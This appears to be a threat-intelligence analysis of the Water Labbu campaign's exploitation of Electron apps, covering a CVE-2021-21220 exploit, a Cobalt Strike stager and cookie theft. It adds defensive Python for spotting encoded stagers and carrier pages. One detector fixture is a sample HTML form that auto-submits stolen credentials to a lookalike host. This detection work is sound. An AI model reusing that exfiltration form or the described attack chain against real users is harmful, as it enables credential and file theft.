
How Water Labbu Exploits Electron-Based Applications

When a weaponized HTML page detects a vulnerable target, it proceeds to load the additional stages of the attack.

The last stage involves creating and loading a new script called “tongji.js,” which in Chinese means 痛擊 (to deliver a punishing attack). These files are hosted inside Water Labbu’s code repository. The “tongji.js” script is a JavaScript file containing exploit code for CVE-2021-21220, with a shellcode that is a Cobalt Strike stager. CVE-2021-21220 is a V8 (JavaScript engine) bug fixed in Chrome 89.0.4389.128, so an Electron application is only exposed while it bundles an older Chromium build. The Metasploit module for this vulnerability is publicly available; Water Labbu reuses that code and wraps it in one or more layers of obfuscation (sojson.v4 among them) before executing the custom shellcode.

The embedded shellcode is either a Cobalt Strike stager or a complex batch command capable of stealing credentials and of downloading and running other scripts and files.

Regardless of whether the embedded shellcode is the stager or the custom batch script, we noticed that the set of malicious operations performed was largely the same:

1) Download and install Cobalt Strike
2) Steal cookies and other important files
3) Download and patch the MeiQia app
4) Download additional spying software
5) Report on the progress of the infection by communicating with the report-collecting server, among other actions

The Cobalt Strike stager is usually encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded into a Golang shellcode runner to make payload detection more difficult. The malware operator was likely inspired by this blog post.
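The layering described above (a stager XOR-encrypted, then Base64- or hex-encoded, then dropped into a runner) is what an analyst has to peel back when triaging a suspected runner binary. The following is an added example, not code from the original post or from Water Labbu's tooling: it strips textual encoding layers, brute-forces a single-byte XOR key, and stops when the well-known Metasploit-style stager prologue that Cobalt Strike stagers share appears. The wrapped sample it runs on is constructed here; the AES case is out of scope because it needs the key recovered from the runner first.

```python
import base64
import binascii
import re

# Signature bytes: the opening instructions of the x64 and x86 Metasploit-style
# stager stubs (cld / and rsp,-16 / call api_resolver), which Cobalt Strike
# stagers share. The wrapped sample below is constructed, not a real capture.
X64_STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0e8c8000000")
X86_STAGER_PROLOGUE = bytes.fromhex("fce88900000060")

_HEX_RE = re.compile(rb"[0-9a-fA-F]+")
_B64_RE = re.compile(rb"[A-Za-z0-9+/=\r\n]+")


def decode_text_layer(blob: bytes):
    """Strip one textual layer (hex or Base64). Returns None if neither applies."""
    text = blob.strip()
    if not text:
        return None
    if _HEX_RE.fullmatch(text) and len(text) % 2 == 0:
        return bytes.fromhex(text.decode("ascii"))
    if _B64_RE.fullmatch(text):
        try:
            return base64.b64decode(text)
        except (binascii.Error, ValueError):
            return None
    return None


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_stager(blob: bytes, max_layers: int = 4):
    """Peel text-encoding layers and brute-force a single-byte XOR key until a
    stager prologue appears. Returns a dict describing the hit, or None.
    Text layers cannot produce a false hit: the prologue starts fc 48, and no
    two hex or Base64 characters XOR to 0xb4."""
    current = blob
    for layer in range(max_layers + 1):
        for key in range(256):
            candidate = xor_single_byte(current, key) if key else current
            for arch, sig in (("x64", X64_STAGER_PROLOGUE), ("x86", X86_STAGER_PROLOGUE)):
                offset = candidate.find(sig)
                if offset != -1:
                    return {"layers": layer, "xor_key": key, "offset": offset, "arch": arch}
        peeled = decode_text_layer(current)
        if peeled is None or peeled == current:
            return None
        current = peeled
    return None


def build_sample(key: int = 0x5A) -> bytes:
    """Constructed test input: a fake x64 stager body, XOR-encrypted, then
    Base64-encoded, then hex-encoded (two textual layers over one XOR layer)."""
    fake_stager = X64_STAGER_PROLOGUE + bytes.fromhex("4151415052515648") + b"A" * 20
    xored = xor_single_byte(fake_stager, key)
    return base64.b64encode(xored).hex().encode("ascii")


if __name__ == "__main__":
    print(find_stager(build_sample()))
```

In practice the blob comes from a string or data-section dump of the Go runner; a hit gives the XOR key and the offset at which the real stager begins, which is enough to carve it and feed it to a Cobalt Strike config parser.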

The stealing routine attempts to collect *.txt files in “\desktop\” and “\Telegram Desktop\,” and MeiQia cookies in “\AppData\Roaming\\cookies.” These files are embedded in a specially crafted .html file and submitted to the information-collecting server with the help of headless Chrome (no visible UI), falling back to Internet Explorer if submission with Chrome fails. The crafted .html file contains one form, one text input holding the computer name, and one text area holding the stolen content. After a timeout expires, the script automatically submits the form to a typosquatting domain.
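Because the carrier page has such a fixed shape (a single form, a text input with the hostname, a textarea with the loot, and a timer that calls submit()), it can be recognised on disk or in a browser cache. The following is an added example, not code from the original post: it parses an HTML file with the standard library, flags forms matching that shape, notes timer-driven submission, and compares the form's target host against a list of trusted hosts to catch lookalikes. The sample page, the hostname report.examp1e.com, and the trusted host report.example.com are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the described carrier page: one form, one text
# input holding the computer name, one textarea holding the stolen content,
# and a timer that submits the form. Hosts are hypothetical.
SAMPLE_HTML = """<html><body>
<form id="f" action="http://report.examp1e.com/collect" method="post">
  <input type="text" name="pc" value="DESKTOP-CONSTRUCTED">
  <textarea name="data">--- notes.txt ---
password=hunter2
</textarea>
</form>
<script>setTimeout(function () { document.getElementById("f").submit(); }, 3000);</script>
</body></html>"""

TRUSTED_HOSTS = {"report.example.com"}  # hypothetical legitimate endpoint

# setTimeout(...) whose callback ends up calling .submit( on something
TIMED_SUBMIT = re.compile(r"setTimeout\s*\(.*?\.submit\s*\(", re.S)


class FormCollector(HTMLParser):
    """Collect forms, their input/textarea fields, and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower(),
                               "inputs": [], "textareas": 0})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("type") or "text").lower())
        elif tag == "textarea" and self.forms:
            self.forms[-1]["textareas"] += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot typosquatted versions of a trusted host."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_exfil_page(html: str, trusted_hosts):
    """Return one finding per form that matches the carrier-page pattern."""
    p = FormCollector()
    p.feed(html)
    timed = any(TIMED_SUBMIT.search(s) for s in p.scripts)
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or ""
        reasons = []
        if "text" in f["inputs"] and f["textareas"] >= 1:
            reasons.append("text input plus textarea carrier")
        if timed:
            reasons.append("timer-driven submit")
        if host and host not in trusted_hosts:
            for t in sorted(trusted_hosts):
                if levenshtein(host, t) <= 2:
                    reasons.append(f"lookalike of trusted host {t}")
        if reasons:
            findings.append({"action": f["action"], "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in looks_like_exfil_page(SAMPLE_HTML, TRUSTED_HOSTS):
        print(hit)
```

Run it over .html files in temp directories and the headless Chrome invocation's file argument; a form hitting all three reasons is a strong indicator, and the extracted host is the IOC to block.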
